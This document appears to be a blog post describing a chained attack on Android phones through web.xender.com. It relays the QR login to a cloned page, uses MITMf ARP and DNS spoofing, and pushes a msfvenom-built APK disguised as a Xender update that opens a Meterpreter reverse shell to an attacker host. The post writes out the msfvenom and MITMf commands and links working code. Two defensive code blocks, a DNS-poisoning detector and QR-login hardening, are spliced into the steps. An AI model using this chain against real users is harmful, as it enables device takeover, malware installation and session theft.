Here is a way to compromise a victim's Android phone using web.xender.com. I have chained several techniques together to achieve this.

Taking over the victim's Xender session

Step 1:

Using the code below, I start a browser session on my PC (the attacker machine) and load web.xender.com, then extract the QR code from it. I use Selenium with Python for this. I use the MQTT protocol to transmit the QR code in real time to the fake page I created by cloning the original web.xender.com.

Step 2:

The QR code received from Step 1 is inserted into the fake page, which I created by modifying the original page's source code, using JavaScript.

Step 3:

Generate a malicious APK that looks like a Xender update. To do that I simply created an app and then injected the Metasploit payload into it with msfvenom:

msfvenom -x xenmod.apk -p android/meterpreter/reverse_tcp LHOST=10.1.75.142 LPORT=4443 -o xen_update.apk

Here we make use of DNS poisoning with the help of MITMf (Man-In-The-Middle Framework).

Put the fake page on your Apache server, then run MITMf with DNS poisoning; don't forget to add a matching rule in mitmf.conf.

mitmf.conf

Launch the MITMf attack against the victim machine you are targeting, or against the whole network.

In my example I am targeting my virtual machine:

sudo python mitmf.py -i eth1 --spoof --arp --dns --analyze --gateway 10.1.75.1 --target 10.1.75.178
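The DNS-poisoning step above only works because the victim's resolver answers a public hostname (web.xender.com) with an address on the attacker's LAN. From the defender's side that is the observable: a resolver log or passive DNS capture in which a public domain resolves to RFC 1918, link-local or loopback space. The following detector is an added example written for this page; it is not code from the post or from the xender2shell project, and the log format, the sample lines and the `LOCAL_SUFFIXES` list are constructed assumptions rather than any real resolver's output.

```python
"""Flag DNS answers that steer a public hostname to a private address.

Added defensive example (not from the original post or the xender2shell
project). A spoofed answer for a public name that points at private,
link-local or loopback space is a strong DNS-poisoning indicator.
The log format below is constructed for this example.
"""
import ipaddress
import re
from typing import List, Tuple

# Constructed sample lines: "<timestamp> <client> <qname> <rtype> <answer>".
# The first and fourth lines mimic the poisoned answers an attack like the
# one above would produce; the others are benign or malformed.
SAMPLE_LOG = """\
2017-03-01T10:00:01 10.1.75.178 web.xender.com A 10.1.75.142
2017-03-01T10:00:02 10.1.75.178 www.example.com A 93.184.216.34
2017-03-01T10:00:03 10.1.75.178 printer.local A 10.1.75.20
2017-03-01T10:00:04 10.1.75.178 web.xender.com AAAA fe80::1
2017-03-01T10:00:05 10.1.75.178 bad line here
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (A|AAAA) (\S+)$")

# Suffixes that legitimately resolve to local addresses on most LANs
# (assumed list; tune it to the environment being monitored).
LOCAL_SUFFIXES = (".local", ".lan", ".internal", ".home", ".arpa")


def is_private_answer(addr: str) -> bool:
    """True if the answer is private, link-local or loopback space."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False  # not an IP literal at all; ignore
    return ip.is_private or ip.is_link_local or ip.is_loopback


def expected_local(qname: str) -> bool:
    """Single-label names and known local suffixes may resolve locally."""
    name = qname.rstrip(".").lower()
    return "." not in name or name.endswith(LOCAL_SUFFIXES)


def find_suspicious(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client, qname, answer) for public names answered privately."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed line: skip rather than crash the detector
        _ts, client, qname, _rtype, answer = m.groups()
        if is_private_answer(answer) and not expected_local(qname):
            hits.append((client, qname, answer))
    return hits


if __name__ == "__main__":
    for client, qname, answer in find_suspicious(SAMPLE_LOG):
        print(f"ALERT client={client} {qname} -> {answer} "
              "(public name answered with a private address)")
```

Run against the embedded sample, both web.xender.com answers are flagged while the public answer for www.example.com and the local-suffix name are not. In practice the same check belongs on the resolver or a network sensor, paired with ARP-spoof monitoring, since MITMf's `--arp` option is what puts the attacker in the resolution path in the first place.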

Step 4:

Wait for the victim to visit web.xender.com and connect his phone.

Step 5:

Once he connects to web.xender.com (note: the victim is actually seeing the page I created), he scans the QR code. His Xender session is now connected to the browser that I started in Step 1.
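What makes Steps 1, 2 and 5 work is that the QR token is issued to the attacker's browser but scanned by the victim's phone; the service cannot tell the difference unless it records who asked for the token and who redeemed it. The sketch below is an added example for this page, not code from the post or from Xender, and the `issue_qr`/`scan` flow, the class names and the 60-second TTL are assumptions standing in for whatever web.xender.com really does. It shows three server-side controls: tokens are single-use, they expire quickly, and the public IP that requested the QR is compared with the public IP of the phone that scans it, so a relayed token is flagged and held for explicit user confirmation instead of silently creating a web session.

```python
"""Server-side hardening of QR-code web login against token relay.

Added example (not the original post's or Xender's code). Names, flow and
the TTL are assumptions. The phone and the browser that requested the QR
normally share a network, so their public IPs match; a relayed QR is
scanned from somewhere else, which is what the mismatch check catches.
"""
import secrets
import time
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple

TOKEN_TTL_SECONDS = 60  # assumed; short enough to limit the relay window


@dataclass
class PendingLogin:
    browser_ip: str      # public IP of the browser that requested the QR
    issued_at: float
    used: bool = False   # single-use: a second scan must fail


@dataclass
class QrLoginService:
    # Injectable clock so expiry can be exercised deterministically.
    clock: Callable[[], float] = time.time
    pending: Dict[str, PendingLogin] = field(default_factory=dict)
    audit: List[Tuple[str, ...]] = field(default_factory=list)

    def issue_qr(self, browser_ip: str) -> str:
        """Browser requests a QR; token is random and bound to its IP."""
        token = secrets.token_urlsafe(32)
        self.pending[token] = PendingLogin(browser_ip, self.clock())
        return token

    def scan(self, token: str, phone_ip: str,
             user_confirmed_mismatch: bool = False) -> Optional[str]:
        """Phone redeems a scanned token; returns a web session id or None.

        user_confirmed_mismatch models the phone app showing "a browser at
        <browser_ip> wants to log in" and the user explicitly accepting.
        """
        entry = self.pending.get(token)
        if entry is None or entry.used:
            self.audit.append(("reject", "unknown_or_reused"))
            return None
        if self.clock() - entry.issued_at > TOKEN_TTL_SECONDS:
            self.audit.append(("reject", "expired"))
            return None
        entry.used = True  # consume before any further decision
        if entry.browser_ip != phone_ip:
            self.audit.append(("mismatch", entry.browser_ip, phone_ip))
            if not user_confirmed_mismatch:
                return None
        return secrets.token_urlsafe(16)  # new web session id


if __name__ == "__main__":
    svc = QrLoginService()
    # Legitimate flow: same public IP on both sides.
    tok = svc.issue_qr("203.0.113.5")
    print("normal login ->", bool(svc.scan(tok, "203.0.113.5")))
    # Relayed flow: QR issued to one network, scanned from another.
    tok = svc.issue_qr("203.0.113.5")
    print("relayed scan ->", svc.scan(tok, "198.51.100.7"))
    print("audit:", svc.audit)
```

The IP comparison is a heuristic (carrier-grade NAT and VPNs produce mismatches for honest users), which is why the example asks the user to confirm rather than refusing outright; the single-use and TTL checks have no such false positives and should always be on.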

Step 6:

Upgrading the Xender session to a Meterpreter shell.

To achieve this I added a few modifications to the code. Xender has an option to install an app on the phone, so we can remotely push the fake update to the user and make him click the update.

In order to install an application via Xender we have to:

1. Click the application's button.
2. Click "Install app".
3. Upload the APK.
4. The install request is then sent to the mobile.

To automate the above process I once again relied on Selenium with Python.

Step 7:

Collect the cookies from the generated session, transmit them to the victim's browser and add them to its memory. Once they are added, the MITMf attack is stopped and a reload request is sent to the victim's browser via JavaScript. This reclaims the real Xender page in the victim's browser, so there is nothing to arouse suspicion.

Xender2Shell working demo:

Working code:

https://github.com/sathish09/xender2shell

Note: if you are using Kali Linux, install a normal Firefox instead of the ESR build.

Post Exploitation:

This can also be used to compromise the victim's mobile if the victim's computer has already been compromised: with access to the computer, a similar technique takes control of the phone.